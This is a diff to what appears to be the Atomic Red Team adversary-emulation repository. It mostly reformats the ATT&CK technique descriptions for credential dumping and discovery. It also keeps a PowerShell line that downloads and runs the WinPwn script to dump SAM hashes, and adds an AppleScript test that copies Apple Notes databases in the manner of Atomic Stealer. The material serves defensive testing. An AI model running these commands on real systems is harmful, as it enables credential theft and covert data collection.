-<blockquote>Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
+<blockquote>
+
+Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
 
 As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
 
@@ -27,6 +29,8 @@ The following SSPs can be used to access credentials:
 * Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
 * Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
 * CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
+
+
 </blockquote>
 
 ## Atomic Tests

atomics/T1003.002/T1003.002.md

@@ -1,6 +1,8 @@
 # T1003.002 - OS Credential Dumping: Security Account Manager
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/002)
-<blockquote>Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.
+<blockquote>
+
+Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.
 
 A number of tools can be used to retrieve the SAM file through in-memory techniques:
 
@@ -21,6 +23,8 @@ Notes:
 * RID 500 account is the local, built-in administrator.
 * RID 501 is the guest account.
 * User accounts start with a RID of 1,000+.
+
+
 </blockquote>
 
 ## Atomic Tests
@@ -332,7 +336,6 @@ Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of
 
 
 ```powershell
-$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
 samfile -consoleoutput -noninteractive
 ```

atomics/T1003.002/T1003.002.yaml

@@ -168,7 +168,6 @@ atomic_tests:
   - windows
   executor:
     command: |-
-      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
       iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
       samfile -consoleoutput -noninteractive  
     name: powershell

atomics/T1003.003/T1003.003.md

@@ -1,6 +1,8 @@
 # T1003.003 - OS Credential Dumping: NTDS
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/003)
-<blockquote>Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)
+<blockquote>
+
+Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)
 
 In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
 
@@ -10,6 +12,8 @@ The following tools and techniques can be used to enumerate the NTDS file and th
 * secretsdump.py
 * Using the in-built Windows tool, ntdsutil.exe
 * Invoke-NinjaCopy
+
+
 </blockquote>
 
 ## Atomic Tests

atomics/T1003.004/T1003.004.md

@@ -1,8 +1,12 @@
 # T1003.004 - OS Credential Dumping: LSA Secrets
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/004)
-<blockquote>Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
+<blockquote>
 
-[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)</blockquote>
+Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
+
+[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1003.005/T1003.005.md

@@ -1,6 +1,8 @@
 # T1003.005 - OS Credential Dumping: Cached Domain Credentials
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/005)
-<blockquote>Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
+<blockquote>
+
+Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
 
 On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
 
@@ -8,7 +10,9 @@ On Linux systems, Active Directory credentials can be accessed through caches ma
 
 With SYSTEM or sudo access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py for Windows or Linikatz for Linux can be used to extract the cached credentials.(Citation: Brining MimiKatz to Unix)
 
-Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)</blockquote>
+Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1003.006/T1003.006.md

@@ -1,10 +1,14 @@
 # T1003.006 - OS Credential Dumping: DCSync
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/006)
-<blockquote>Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
+<blockquote>
+
+Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
 
 Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)
 
-DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)</blockquote>
+DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1003.007/T1003.007.md

@@ -1,10 +1,14 @@
 # T1003.007 - OS Credential Dumping: Proc Filesystem
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/007)
-<blockquote>Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
+<blockquote>
+
+Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
 
 When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns indicative of credentials. Adversaries may use regex patterns, such as <code>grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | cut -d' ' -f 1</code>, to look for fixed strings in memory structures or cached hashes.(Citation: atomic-red proc file system) When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)
 
-If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.</blockquote>
+If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1003.008/T1003.008.md

@@ -1,8 +1,12 @@
 # T1003.008 - OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/008)
-<blockquote>Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
+<blockquote>
+
+Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
 
 The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) <code># /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>
+
+
 </blockquote>
 
 ## Atomic Tests

atomics/T1003/T1003.md

@@ -1,8 +1,12 @@
 # T1003 - OS Credential Dumping
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003)
-<blockquote>Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
+<blockquote>
+
+Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
 
 Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
+
+
 </blockquote>
 
 ## Atomic Tests

atomics/T1005/T1005.md

@@ -1,8 +1,12 @@
 # T1005 - Data from Local System
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1005)
-<blockquote>Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
+<blockquote>
+
+Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
 
 Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
+
+
 </blockquote>
 
 ## Atomic Tests
@@ -11,6 +15,8 @@ Adversaries may do this using a [Command and Scripting Interpreter](https://atta
 
 - [Atomic Test #2 - Find and dump sqlite databases (Linux)](#atomic-test-2---find-and-dump-sqlite-databases-linux)
 
+- [Atomic Test #3 - Copy Apple Notes database files using AppleScript](#atomic-test-3---copy-apple-notes-database-files-using-applescript)
+
 
 <br/>
 
@@ -134,4 +140,41 @@ if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then yum update -y && yu
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - Copy Apple Notes database files using AppleScript
+This command will copy Apple Notes database files using AppleScript as seen in Atomic Stealer.
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** cfb6d400-a269-4c06-a347-6d88d584d5f7
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| destination_path | Specify the path to copy the database files into. | path | /private/tmp|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
+```
+
+#### Cleanup Commands:
+```sh
+rm "#{destination_path}/NoteStore.sqlite*"
+```
+
+
+
+
+
 <br/>

atomics/T1005/T1005.yaml

@@ -88,3 +88,21 @@ atomic_tests:
         rm -f $HOME/.art
         rm -f $HOME/gta.db
         rm -f $HOME/sqlite_dump.sh 
+
+- name: Copy Apple Notes database files using AppleScript
+  auto_generated_guid: cfb6d400-a269-4c06-a347-6d88d584d5f7
+  description: |
+    This command will copy Apple Notes database files using AppleScript as seen in Atomic Stealer.
+  supported_platforms:
+  - macos
+  input_arguments:
+    destination_path:
+      description: Specify the path to copy the database files into.
+      type: path
+      default: /private/tmp
+  executor:
+    command: |-
+      osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
+    cleanup_command: 'rm "#{destination_path}/NoteStore.sqlite*"'
+    name: sh
+    elevation_required: false

atomics/T1006/T1006.md

@@ -1,8 +1,12 @@
 # T1006 - Direct Volume Access
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1006)
-<blockquote>Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
+<blockquote>
 
-Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)</blockquote>
+Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
+
+Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1007/T1007.md

@@ -1,8 +1,12 @@
 # T1007 - System Service Discovery
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1007)
-<blockquote>Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.
+<blockquote>
 
-Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</blockquote>
+Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.
+
+Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1010/T1010.md

@@ -1,8 +1,12 @@
 # T1010 - Application Window Discovery
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1010)
-<blockquote>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
+<blockquote>
 
-Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.</blockquote>
+Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
+
+Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1012/T1012.md

@@ -1,8 +1,12 @@
 # T1012 - Query Registry
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1012)
-<blockquote>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
+<blockquote>
 
-The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</blockquote>
+Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
+
+The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1014/T1014.md

@@ -1,8 +1,12 @@
 # T1014 - Rootkit
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1014)
-<blockquote>Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) 
+<blockquote>
 
-Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)</blockquote>
+Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) 
+
+Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1016.001/T1016.001.md

@@ -1,8 +1,12 @@
 # T1016.001 - System Network Configuration Discovery: Internet Connection Discovery
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016/001)
-<blockquote>Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.
+<blockquote>
 
-Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.</blockquote>
+Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.
+
+Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.
+
+</blockquote>
 
 ## Atomic Tests
 
@@ -74,7 +78,7 @@ Check internet connection using ping on Linux, MACOS. The default target of the
 
 
 ```bash
-ping -n 4 #{ping_target}
+ping -c 4 #{ping_target}
 ```
 
 

atomics/T1016.001/T1016.001.yaml

@@ -33,7 +33,7 @@ atomic_tests:
     name: bash
     elevation_required: false
     command: |
-      ping -n 4 #{ping_target}
+      ping -c 4 #{ping_target}
 - name: Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping)
   auto_generated_guid: f8160cde-4e16-4c8b-8450-6042d5363eb0
   description: |

atomics/T1016.002/T1016.002.md

@@ -1,10 +1,14 @@
 # T1016.002 - System Network Configuration Discovery: Wi-Fi Discovery
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016/002)
-<blockquote>Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
+<blockquote>
+
+Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
 
 Adversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through `netsh wlan show profiles` to enumerate Wi-Fi names and then `netsh wlan show profile “Wi-Fi name” key=clear` to show a Wi-Fi network’s corresponding password.(Citation: BleepingComputer Agent Tesla steal wifi passwords)(Citation: Malware Bytes New AgentTesla variant steals WiFi credentials)(Citation: Check Point APT35 CharmPower January 2022) Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to `wlanAPI.dll` [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: Binary Defense Emotes Wi-Fi Spreader)
 
 On Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/`.(Citation: Wi-Fi Password of All Connected Networks in Windows/Linux) On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname` (requires admin username/password).(Citation: Find Wi-Fi Password on Mac)
+
+
 </blockquote>
 
 ## Atomic Tests

atomics/T1016/T1016.md

@@ -1,10 +1,14 @@
 # T1016 - System Network Configuration Discovery
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016)
-<blockquote>Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
+<blockquote>
+
+Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
 
 Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )
 
-Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. </blockquote>
+Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. 
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1018/T1018.md

@@ -1,10 +1,14 @@
 # T1018 - Remote System Discovery
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1018)
-<blockquote>Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as  [Ping](https://attack.mitre.org/software/S0097) or <code>net view</code> using [Net](https://attack.mitre.org/software/S0039).
+<blockquote>
+
+Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as  [Ping](https://attack.mitre.org/software/S0097) or <code>net view</code> using [Net](https://attack.mitre.org/software/S0039).
 
 Adversaries may also analyze data from local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.
 
 Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)  
+
+
 </blockquote>
 
 ## Atomic Tests

atomics/T1020/T1020.md

@@ -1,8 +1,12 @@
 # T1020 - Automated Exfiltration
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1020)
-<blockquote>Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020) 
+<blockquote>
 
-When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</blockquote>
+Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020) 
+
+When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1021.001/T1021.001.md

@@ -1,10 +1,14 @@
